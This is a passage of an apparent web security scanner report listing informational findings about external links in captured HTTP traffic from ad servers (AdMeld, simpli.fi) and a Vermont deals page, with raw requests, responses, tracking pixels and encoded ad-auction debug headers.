Ijoid3d3LmFydGluc3RpdHV0ZXMuZWR1IiwiYW4iOiJBcnQgSW5zdGl0dXRlcyIsInN0YXR1cyI6IjAuMTIiLCJmaWQiOjUwOCwgImZjcG0iOiIyLjI1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODEsICJidXkiOjUwMywibHAiOiJodHRwOi8vbWVhbmluZ2Z1bGJlYXV0eS5jb20iLCJhbiI6IiIsInN0YXR1cyI6IjAuMDMiLCJmaWQiOjUwOCwgImZjcG0iOiIyLjI1In0seyJuZXR3b3JrX25hbWUiOiJ4KzEgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxMTc4MTUsICJidXkiOjkwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYTYgRGVncmVlcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjIxNDEwNzksICJidXkiOjMzMTEsImxwIjoiaHR0cDovL3d3dy52aXJnaW5hbWVyaWNhLmNvbS92eC9ib29raW5nL2V4aXQtaGFwcGllcj9jaWQ9ZGlzXzAwMDc2IiwiYW4iOiIiLCJzdGF0dXMiOiIxLjIzIE4iLCJmaWQiOjUwOCwgImZjcG0iOiIyLjI1In0seyJuZXR3b3JrX25hbWUiOiJUdWJlbW9ndWwgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1ODk1ODA4LCAiYnV5Ijo4NDcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjg5NywgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93ZWxjb21lLmhwLmNvbS9jb3VudHJ5L3VzL2VuL2NzL2hvbWVfYy5odG1sIiwiYW4iOiJIUCBEaXJlY3QiLCJzdGF0dXMiOiIwLjEyIiwiZmlkIjo1MDgsICJmY3BtIjoiMi4yNSJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcyNSJ9
Content-Length: 994
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:31:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<div style="width:0;height:0">


<script type="text/javascript" src="http://um.simpli.fi/am_match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...
10.170. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA0NDAxNjgzLCAgbmV0d29yazogICAgICAidHVybiIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtMiIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNjY4Mzc1MTctNDU3ZS00NjgyLWE0OTQtYTAyMDUwNDhkOWY3IiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAicG9saXRpY3MtYm90dG9tIiwgIGRpdjogICAgICAgICAgIjY2ODM3NTE3LTQ1N2UtNDY4Mi1hNDk0LWEwMjA1MDQ4ZDlmNyIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAyNCwgIGFjY291bnRfaWQ6ICAgNTQsICBuZXR3b3JrX25hbWU6ICJUdXJuIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjM3IiwgIGZlY3BtOiAgICAgICAgIjEuMzciLCAgZmlsbDogICAgICAgICAiMTMuNjMiLCAgcGxhY2VtZW50OiAgICAicG9saXRpY3MtYm90dG9tIiwgIHJ1bGU6ICAgICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYzMDQ5LCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTk3MTgxLCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMTQxMDc5LCAiYnV5IjozMzExLCJscCI6Imh0dHA6Ly93d3cudmlyZ2luYW1lcmljYS5jb20vdngvYm9va2luZy9leGl0LWhhcHBpZXI/Y2lkPWRpc18wMDA3NiIsImFuIjoiIiwic3RhdHVzIjoiMS4yMyBOIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTU4MDgsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyODk3LCAiYnV5IjoxODksImxwIjoiaHR0cDovL3d3dy5ob21lZGVwb3QuY29tLyIsImFuIjoiSG9tZSBEZXBvdCIsInN0YXR1cyI6IjEuNDEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI5NzksICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ1In0=
Content-Length: 1838
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<div style="width:0;height:0">


<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=e36a2f20-9985-4dcd-82e9-6ff0312e024e&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel"/>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match"></iframe>

<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...
10.171. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/728x90/ros

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU4NzQsICBuZXR3b3JrOiAgICAgICJtYXhwb2ludCIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMi05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjMxMjMwMTUyLTljNzItNGZhOC1iZDc2LWI1YmRhMTY0ZTQ2MCIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICIzMTIzMDE1Mi05YzcyLTRmYTgtYmQ3Ni1iNWJkYTE2NGU0NjAiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgInJlYWwtdGltZSBiaWQiLCAgaW1wOiAgICAgICAgICAyLCAgbmV0d29ya19pZDogICAyMzMsICBhY2NvdW50X2lkOiAgIDYyODksICBuZXR3b3JrX25hbWU6ICJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS43NiIsICBmZWNwbTogICAgICAgICIxLjc2IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6MzM1ODc0LCAiYnV5IjoxNzgsImxwIjoiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCJhbiI6IiIsInN0YXR1cyI6IjMuMDEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1OTEwLCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMTQxMTE2LCAiYnV5IjozMzEyLCJscCI6Imh0dHA6Ly93d3cudmlyZ2luYW1lcmljYS5jb20vdngvYm9va2luZy9leGl0LWhhcHBpZXI/Y2lkPWRpc18wMDA3NiIsImFuIjoiIiwic3RhdHVzIjoiMS4yMyBOIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODAsICJidXkiOjE5NiwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xNCIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODMsICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCAgaG9zdDogICAgICAgICAibmotdGFnMzcifQ==
Content-Length: 1304
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=728x90&mid=B1B_1F3FEDF2_3CE62FA&bp=3.01&sp=2.02&dm=Zm94bmV3cy5jb20&cp=3B9"></script>
...[SNIP]...
<div style="width:0;height:0">


<img width="0" height="0" src="http://adadvisor.net/adscores/g.pixel?sid=9223635428&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_dataprovider_id=1&admeld_callback=http://tag.admeld.com/pixel"/>

<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel"></script>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://rs.gwallet.com/r1/pixel/x113?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_dataprovider_id=17&admeld_callback=http://tag.admeld.com/pixel"></iframe>
...[SNIP]...
10.172. http://um.simpli.fi/am_js.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /am_js.js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 157

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');

10.173. http://wcax.upickem.net/engine/Splash.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /engine/Splash.aspx?contestid=17178 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:12 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=82232438-4/9/2011 8:31:12 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:12 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:11 GMT
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<meta name="ROBOTS" content="index, follow" />

                   <link href="http://vermontopia.com/layout/general_structure.css" rel="stylesheet" type="text/css" media="all" />
           <link href="http://vermontopia.com/layout/general_dynamic.php" rel="stylesheet" type="text/css" media="all" />
                   <link href="http://vermontopia.com/custom/content_files/noimage.css" rel="stylesheet" type="text/css" media="all" />
       <script type="text/javascript">
...[SNIP]...
</script>

       <script src="http://vermontopia.com/scripts/lang.js.php" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/common.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/location.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/loadtheme.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/advancedsearch.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/contactclick.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/cookies.js" language="javascript" type="text/javascript"></script>


                               <script src="http://vermontopia.com/scripts/jquery.js" language="javascript" type="text/javascript">$.preloadCssImages();</script>
<script src="http://vermontopia.com/scripts/jquery/jquery.cookie.js" type="text/javascript"></script>
               <script src="http://vermontopia.com/scripts/jquery/jquery.autocomplete.js" type="text/javascript"></script>
       <link href="http://vermontopia.com/scripts/jquery/jquery.autocomplete.css" rel="stylesheet" type="text/css" media="all" />
        <script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jcrop/js/jquery.Jcrop.js"></script>
<link rel="stylesheet" href="http://vermontopia.com/scripts/jquery/jcrop/css/jquery.Jcrop.css" type="text/css" />
               <script src="http://vermontopia.com/scripts/jquery/jquery.thickbox.js" type="text/javascript"></script>
       <link href="http://vermontopia.com/scripts/jquery/thickbox/thickbox.css" rel="stylesheet" type="text/css" media="all" />
               <script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jquery.selectbox.js"></script>
       <script src="http://vermontopia.com/scripts/review.js" language="javascript" type="text/javascript"></script>
        <link type="text/css" href="http://vermontopia.com/scripts/jquery/jquery_ui/css/smoothness/jquery-ui-1.7.2.custom.css" rel="stylesheet" />
<script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jquery_ui/js/jquery-ui-1.7.2.custom.min.js"></script>

       <script language="javascript" type="text/javascript" src="http://vermontopia.com/scripts/checkusername.js"></script>
       <script language="javascript" type="text/javascript" src="http://vermontopia.com/scripts/socialbookmarking.js"></script>
...[SNIP]...
</head>

   <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=true&amp;key=ABQIAAAAC-ql6H5r1qnVMqxBP63Z8hQw1gWJNEO1Cn5TQmwHwmBmp3h6FhQGIzG5Agxz3d54vos97_OkOX6cZA" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://vermontopia.com/profile/login.php?destiny=http://vermontopia.com/profile/&keepThis=true&width=250&height=345&modal=true" class="thickbox">Sign In</a>
...[SNIP]...
<li><a href="http://vermontopia.com/profile/add.php">Add a Profile!</a>
...[SNIP]...
<h1 class="logo"><a href="http://vermontopia.com/index.php" target="_parent" title="vermontopia.com" ><span>
...[SNIP]...
<li id="TM0"><a href="http://vermontopia.com/index.php">Home</a>
...[SNIP]...
<li id="TM1" ><a href="http://vermontopia.com/business/">Businesses</a>
...[SNIP]...
<li id="TM2" ><a href="http://vermontopia.com/event/">Events</a>
...[SNIP]...
<li id="TM3" ><a href="http://vermontopia.com/classified/">Classifieds</a>
...[SNIP]...
<li id="TM4" ><a href="http://vermontopia.com/article/">Articles</a>
...[SNIP]...
<li id="TM5" ><a href="http://vermontopia.com/coupon/">Coupons</a>
...[SNIP]...
<li ><a href="http://vermontopia.com/blog/index.php">Blog</a>
...[SNIP]...
<li id="TM6" ><a href="http://vermontopia.com/advertise.php">Join</a>
...[SNIP]...
<li id="TM7" ><a href="http://vermontopia.com/contactus.php">Contact Us</a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</a>
<a href="http://twitter.com/home?status=Blue+Morpho+Technologies+-+One-hour+tech+visit+for+just+%2425+(normally+%2455%3b+one+hour+minimum+required):+http%3a%2f%2fupickem.net%2f536aEQqHYL6%3fr%3d277417" title="Add to Twitter" target="_blank" style="display:inline;background-color:inherit;background-image:url('');"><img src="images/twitternew.png" border="0" style="vertical-align:middle;display:inline;padding:0px;margin:0px;background-color:inherit;background-image:url('');" />
...[SNIP]...
<td align="center" style="text-align: center;">
<img src="http://blackpearl.wcax.com/Jumpon-It/Clients/Logos/bluemorpho-Main.jpg" border="0" class="UPE-DealImageFull" ><div class="UPE-Space3">
...[SNIP]...
<br><a href="http://www.bluemorph.com" target="_blank" class="UPE-Link">www.bluemorph.com</a>
...[SNIP]...
<br><iframe src="http://www.facebook.com/plugins/likebox.php?id=230427970205&amp;width=300&amp;connections=10&amp;stream=true&amp;header=true&amp;height=350" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:350px;" allowTransparency="true"></iframe>
...[SNIP]...
</h1>&nbsp;&nbsp;&nbsp;
Powered by &copy;
<a href="http://www.deadlinedeals.com" class="UPE-CopyrightText" target="DeadlineDeals">Deadline Deals</a>
...[SNIP]...
<li id="FM1_0"><a href="http://vermontopia.com/index.php">Home</a>
...[SNIP]...
<li id="FM1_1"><a href="http://vermontopia.com/advertise.php">Join</a>
...[SNIP]...
<li id="FM1_2"><a href="http://vermontopia.com/faq.php">FAQ</a>
...[SNIP]...
<li id="FM1_3"><a href="http://vermontopia.com/sitemap.php">Sitemap</a>
...[SNIP]...
<li id="FM1_4"><a href="http://vermontopia.com/contactus.php">Contact Us</a>
...[SNIP]...
<li id="FM2_0"><a href="http://vermontopia.com/business/">Businesses</a>
...[SNIP]...
<li id="FM2_1"><a href="http://vermontopia.com/event/">Events</a>
...[SNIP]...
<li id="FM2_2"><a href="http://vermontopia.com/classified/">Classifieds</a>
...[SNIP]...
<li id="FM2_3"><a href="http://vermontopia.com/article/">Articles</a>
...[SNIP]...
<li id="FM2_4"><a href="http://vermontopia.com/coupon/">Coupons</a>
...[SNIP]...
<li><a href="http://vermontopia.com/blog/">Blog</a>
...[SNIP]...
10.174. http://wcax.upickem.net/engine/Splash.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /engine/Splash.aspx?contestid=17178 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:12 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=688560985-4/9/2011 8:31:12 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:12 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:12 GMT
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<meta name="ROBOTS" content="index, follow" />

                   <link href="http://vermontopia.com/layout/general_structure.css" rel="stylesheet" type="text/css" media="all" />
           <link href="http://vermontopia.com/layout/general_dynamic.php" rel="stylesheet" type="text/css" media="all" />
                   <link href="http://vermontopia.com/custom/content_files/noimage.css" rel="stylesheet" type="text/css" media="all" />
       <script type="text/javascript">
...[SNIP]...
</script>

       <script src="http://vermontopia.com/scripts/lang.js.php" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/common.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/location.js" language="javascript" type="text/javascript"></script>
